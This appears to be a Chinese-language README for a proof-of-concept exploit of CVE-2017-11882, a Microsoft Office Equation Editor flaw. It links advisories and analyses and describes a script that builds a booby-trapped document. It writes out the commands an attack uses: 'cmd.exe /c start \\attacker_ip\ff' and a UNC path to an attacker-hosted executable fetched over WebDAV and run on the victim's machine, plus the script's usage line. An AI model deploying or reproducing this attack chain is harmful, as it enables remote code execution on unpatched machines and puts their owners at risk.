CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
研究: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
补丁分析: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC 利用: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
针对 CVE-2017-11882 的简单 PoC。 此漏洞利用会触发 WebClient 服务启动,并从攻击者控制的 WebDav 服务器执行远程文件。 这种方法之所以方便,是因为可执行命令的长度有限制。 然而,借助 WebDav,可以在易受攻击的机器上启动任意攻击者控制的可执行文件。 此脚本会创建一个包含多个 OLE 对象的简单文档。 这些对象利用了 CVE-2017-11882,从而实现顺序命令执行。
触发 WebClient 服务启动的第一个命令可能如下所示:
cmd.exe /c start \\attacker_ip\ff
攻击者控制的二进制文件路径应为 UNC 网络路径:
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
example 文件夹包含一个 .rtf 文件,该文件利用了 CVE-2017-11882 漏洞并在系统中运行计算器。